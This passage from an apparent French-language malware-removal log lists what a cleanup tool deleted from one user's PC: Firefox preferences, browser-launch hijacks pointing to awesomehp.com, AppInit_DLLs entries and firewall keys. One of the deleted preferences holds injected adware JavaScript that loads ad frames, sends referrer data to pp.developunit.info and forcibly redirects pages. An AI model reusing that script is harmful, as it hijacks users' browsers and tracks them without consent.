'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [622,size]);}}catch(e){return !1;}},eviral_apx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2142333&size='+size+'', (atp?atp:1), [623,size]);}}catch(e){return !1;}},yashi_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2257065\",\"300x250\":\"2257066\",\"728x90\":\"2257067\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [626,size]);}}catch(e){return !1;}},cpx_favor_cpm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2260941&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [629,size]);}}catch(e){return !1;}},adnetwork_adnttb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2242949&size='+size+'&cb=[CACHEBUSTER]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [630,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size='+size+'&referrer=', (atp?atp:1), [442,size]);}}catch(e){return !1;}},adstract_strm_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2248834&size='+size+'', (atp?atp:1), [617,size]);}}catch(e){return !1;}},mari_strm10:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2250216\",\"300x250\":\"2250217\",\"160x600\":\"2250218\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [606,size]);}}catch(e){return !1;}},mari_strm10_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2250209\",\"300x250\":\"2250210\",\"160x600\":\"2250211\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [607,size]);}}catch(e){return !1;}},mari_strm_tier1_4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2250245\",\"300x250\":\"2250246\",\"728x90\":\"2250248\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [608,size]);}}catch(e){return !1;}},matomy_strm13_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2251075\",\"728x90\":\"2251082\",\"160x600\":\"2251085\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [610,size]);}}catch(e){return !1;}},matomy_strm13:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2251074\",\"728x90\":\"2251077\",\"160x600\":\"2251084\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [611,size]);}}catch(e){return !1;}},dsnr_strm_legal:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2242464\",\"728x90\":\"2242956\",\"160x600\":\"2242957\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [614,size]);}}catch(e){return !1;}},web3_strm_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2251256&size='+size+'', (atp?atp:1), [621,size]);}}catch(e){return !1;}},ybrant_apx_strm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://v2.ministerial5.com/creative/2-002136099-00001i;size='+arr,ref=window.self==window.top?window.self.location.href:'';return function(ifr){_zyad.iset(ifr, ''+surl+';tag_id=2401;ref='+ref+'', (atp?atp:1), [597,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type='+size+'&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://pp.developunit.info/z/?eid=764&hid=16312633258232554784&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://pp.developunit.info/e/?eid=764&hid=16312633258232554784&pid=0&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})()})();(function(){void(0)})()"); [Audrey] Supprimé avec succès : user_pref("extensions.helperbar.SmartbarDisabled", false); [Audrey] Supprimé avec succès : user_pref("extensions.helperbar.SmartbarStateMinimaized", false); [Audrey] Supprimé avec succès : user_pref("extensions.iminent.autoRvrt", "false"); [Audrey] Supprimé avec succès : user_pref("extensions.iminent.newTab", false); [Audrey] Supprimé avec succès : user_pref("extensions.iminent.rvrt", "false"); [Audrey] Supprimé avec succès : user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1392555908764},\"{ABDE892B-13A8-4d1b-88E6-365A6E755758}\":{\"descriptor\":\"C:\\\\ProgramData\\\\RealNetworks\\\\RealDownloader\\\\BrowserPlugins\\\\Firefox\\\\Ext\",\"mtime\":1388073912764},\"lightningnewtab@gmail.com\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\lightningnewtab@gmail.com.xpi\",\"mtime\":1390438600000}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1360438914320}}},{\"name\":\"app-profile\",\"addons\":{\"firefox@webconnect.co\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\firefox@webconnect.co\",\"mtime\":1377255753774},\"jid0-O6MIff3eO5dIGf5Tcv8RsJDKxrs@jetpack\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\jid0-O6MIff3eO5dIGf5Tcv8RsJDKxrs@jetpack\",\"mtime\":1392487236931},\"lightningnewtab@gmail.com\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\lightningnewtab@gmail.com.xpi\",\"mtime\":1390438600000},\"npliau@eeeijlztb.org\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\npliau@eeeijlztb.org\",\"mtime\":1392498495785},\"torntv@torntv.com\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\torntv@torntv.com.xpi\",\"mtime\":1355684421366},\"wh_6aiu@bvpbyolmnu.edu\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\wh_6aiu@bvpbyolmnu.edu\",\"mtime\":1378172004781},\"{30A7232F-77C9-4bd3-A812-3036704DB7AC}\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\{30A7232F-77C9-4bd3-A812-3036704DB7AC}\",\"mtime\":1340442537381},\"{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\",\"mtime\":1378172002907},\"{37fa1426-b82d-11db-8314-0800200c9a66}\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\{37fa1426-b82d-11db-8314-0800200c9a66}.xpi\",\"mtime\":1378915869775},\"{ef4e370e-d9f0-4e00-b93e-a4f274cfdd5a}\":{\"descriptor\":\"C:\\\\Users\\\\Audrey\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\n7eymfj7.default\\\\extensions\\\\{ef4e370e-d9f0-4e00-b93e-a4f274cfdd5a}.xpi\",\"mtime\":1378915869650}}}]"); [Audrey] Supprimé avec succès : user_pref("foxTab.toolbarCustomizationDone", true); [Audrey] Supprimé avec succès : user_pref("iminent.enabledAds", "false"); [Audrey] Supprimé avec succès : user_pref("iminent.newtabredirect", "true"); [Audrey] Supprimé avec succès : user_pref("iminent.nomsi", "true"); [Audrey] Supprimé avec succès : user_pref("iminent.searchindex", "1"); ¤¤¤¤¤¤¤¤¤¤ | Détournement des clés StartMenuInternet Réparé : [HKLM\Software\Clients\StartMenuInternet\Firefox.exe\shell\open\command] : C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.awesomehp.com/?type=sc&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2 -> "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" Réparé : [HKLM\Software\Clients\StartMenuInternet\IExplore.exe\shell\open\command] : C:\Program Files (x86)\Internet Explorer\iexplore.exe http://www.awesomehp.com/?type=sc&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2 -> "C:\Program Files (x86)\Internet Explorer\iexplore.exe" ¤¤¤¤¤¤¤¤¤¤ | AppInit_DLLs Réparé : [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]|[AppInit_DLLS] : c:\progra~3\browse~2\261519~1.190\{c16c1~1\browse~1.dll c:\progra~2\optimi~1\optpro~1.dll -> Réparé : [HKLM64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]|[AppInit_DLLS] : C:\PROGRA~2\OPTIMI~1\OPTPRO~2.DLL -> [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]|[LoadAppInit_DLLs] : 1 ¤¤¤¤¤¤¤¤¤¤ | Détournement Javascript ¤¤¤¤¤¤¤¤¤¤ | Firewall Réparé : [HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]|[EnableFirewall] : 1 -> 0 Réparé : [HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]|[EnableFirewall] : 1 -> 0 Réparé : [HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]|[EnableFirewall] : 1 -> 0 ¤¤¤¤¤¤¤¤¤¤ | Fichiers temporaires [All Users] Fichiers temporaires Supprimés : 0 Ko [Default User] Fichiers temporaires Supprimés : 0 Ko [Default] Fichiers temporaires Supprimés : 0 Ko [Public] Fichiers temporaires Supprimés : 0 Ko [Audrey] Fichiers temporaires Supprimés : 147458 Ko ¤¤¤¤¤¤¤¤¤¤ |EOF| ¤¤¤¤¤¤¤¤¤¤ | 11:11:45